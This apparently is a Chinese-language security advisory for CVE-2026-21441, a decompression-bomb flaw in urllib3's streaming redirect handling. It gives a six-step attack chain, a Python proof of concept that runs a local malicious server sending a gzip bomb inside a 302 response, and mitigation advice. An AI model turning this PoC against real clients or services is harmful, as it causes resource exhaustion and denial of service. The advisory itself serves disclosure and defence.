CVE-2026-21441 urllib3流式API重定向响应解压炸弹漏洞

漏洞信息

漏洞编号

CVE-2026-21441

漏洞类型

资源消耗攻击

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

urllib3

漏洞概述

urllib3是Python中广泛使用的HTTP客户端库。CVE-2026-21441是该库中一个高危的安全漏洞，存在于流式API处理HTTP重定向响应时的解压机制中。漏洞源于urllib3在处理重定向响应时，会在用户调用任何读取方法之前就自动读取并解压整个响应体内容，即使配置了preload_content=False参数。这种设计导致解压炸弹防护机制失效，恶意服务器可以通过构造携带高度压缩payload（如zip炸弹或bzip炸弹）的HTTP 302重定向响应，诱使客户端在接收任何数据前就执行大量解压操作。最终造成CPU、内存等系统资源的过度消耗，可能导致应用程序崩溃或服务中断。该漏洞影响所有在生产环境中使用urllib3流式API且需要处理重定向响应的应用。

技术细节

urllib3的流式API设计初衷是高效处理大型HTTP响应，通过分块读取避免将整个响应体加载到内存中。库支持多种Content-Encoding格式的自动解码（gzip、deflate、br、zstd等）。在正常流式读取场景下，库会按需解压数据并应用配置的读取限制。然而，在HTTP 302/301等重定向响应处理流程中，urllib3为了确保连接正确关闭，会预先读取并解压整个响应体。这个预解压操作发生在任何read()方法调用之前，且绕过了用户配置的read_limit和chunk_size限制。攻击者可以架设恶意HTTP服务器，当受害客户端发起请求时，返回一个302重定向到精心构造的响应。该响应包含极小体积但解压后巨大的恶意数据（典型的zip炸弹在解压后可达数十GB）。由于预解压机制，客户端在收到重定向响应后会立即执行解压操作，在应用程序代码有机会检查或拒绝数据之前就消耗大量系统资源。CVSS向量AV:N/AC:L/PR:N/UI:N/S:U表明该漏洞可通过网络直接利用，无需认证或用户交互。

攻击链分析

STEP 1

1. 侦察阶段

攻击者识别目标应用使用的Python urllib3库版本，确认版本在1.22到2.6.3之间，并确认应用使用流式API（preload_content=False）

STEP 2

2. 恶意服务器部署

攻击者部署恶意HTTP服务器，构造包含极小体积但解压后巨大的payload（如zip炸弹、bzip炸弹），准备好发送302/301重定向响应

STEP 3

3. 诱饵请求

攻击者通过钓鱼、社会工程或API滥用等方式诱使受害者应用向恶意服务器发起HTTP请求

STEP 4

4. 重定向触发

恶意服务器返回302重定向响应，Content-Encoding设为gzip，并携带压缩后的炸弹payload

STEP 5

5. 预解压执行

urllib3在处理重定向响应时，自动在调用任何read()方法前解压整个响应体，绕过read_limit限制

STEP 6

6. 资源耗尽

解压操作消耗大量CPU和内存资源，可能导致应用崩溃、拒绝服务或系统不稳定

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-21441 PoC - urllib3 decompression bomb via redirect
This PoC demonstrates how a malicious server can trigger excessive resource 
consumption on urllib3 client through crafted redirect responses.
"""

import http.server
import socketserver
import threading
import time
import gzip
import os

# Generate a small but highly compressible payload (zip bomb simulation)
def generate_bomb_payload():
    """Generate payload that expands dramatically when decompressed"""
    # Create data that compresses extremely well (repeated pattern)
    bomb_data = b'\x00' * 1024 * 1024  # 1MB of zeros compresses to ~1KB
    return gzip.compress(bomb_data)

class MaliciousRedirectHandler(http.server.BaseHTTPRequestHandler):
    """Handler that sends redirect with decompression bomb"""
    
    def do_GET(self):
        if self.path == '/normal':
            # Initial request - send redirect
            self.send_response(302)
            self.send_header('Location', '/bomb')
            self.send_header('Content-Encoding', 'gzip')
            self.send_header('Content-Length', str(len(self.bomb_payload)))
            self.end_headers()
            self.wfile.write(self.bomb_payload)
        elif self.path == '/bomb':
            # Redirect target with bomb payload
            self.send_response(200)
            self.send_header('Content-Type', 'text/plain')
            self.end_headers()
            self.wfile.write(b'Bomb triggered!')
    
    def log_message(self, format, *args):
        print(f"[Malicious Server] {format % args}")

def start_malicious_server(port=8888):
    """Start the malicious server"""
    # Pre-generate bomb payload
    MaliciousRedirectHandler.bomb_payload = generate_bomb_payload()
    print(f"Generated bomb payload: {len(MaliciousRedirectHandler.bomb_payload)} bytes")
    
    with socketserver.TCPServer(("", port), MaliciousRedirectHandler) as httpd:
        print(f"Malicious server running on port {port}")
        httpd.handle_request()

def exploit_urllib3():
    """Demonstrate the vulnerability using urllib3"""
    import urllib3
    
    print("\n[*] Testing urllib3 with preload_content=False")
    print("[*] This configuration is vulnerable to decompression bomb via redirect\n")
    
    # Vulnerable configuration: preload_content=False with redirects enabled
    http = urllib3.PoolManager()
    
    try:
        # This will trigger the redirect, causing pre-decompression of bomb
        response = http.request('GET', 'http://localhost:8888/normal', 
                               preload_content=False,
                               timeout=10.0)
        print("[!] Request completed - decompression bomb was processed")
        print(f"[*] Response data available: {response.data}")
    except Exception as e:
        print(f"[!] Request failed (may indicate resource exhaustion): {e}")

if __name__ == '__main__':
    print("=" * 60)
    print("CVE-2026-21441 - urllib3 Decompression Bomb via Redirect")
    print("=" * 60)
    
    # Start malicious server in background
    server_thread = threading.Thread(target=start_malicious_server, daemon=True)
    server_thread.start()
    time.sleep(0.5)
    
    # Run exploit
    exploit_urllib3()

影响范围

urllib3 >= 1.22 and < 2.6.3

防御指南

临时缓解措施

如果无法立即升级urllib3版本，可通过在请求配置中设置redirect=False参数来临时禁用自动重定向，从而避免触发预解压机制。对于必须处理重定向的场景，应在应用层实现自定义的重定向处理逻辑，在接收完整响应前先检查Content-Length和Content-Encoding头信息，丢弃来源不明的重定向响应。此外，考虑使用进程隔离和资源配额限制，防止单个请求消耗过多系统资源。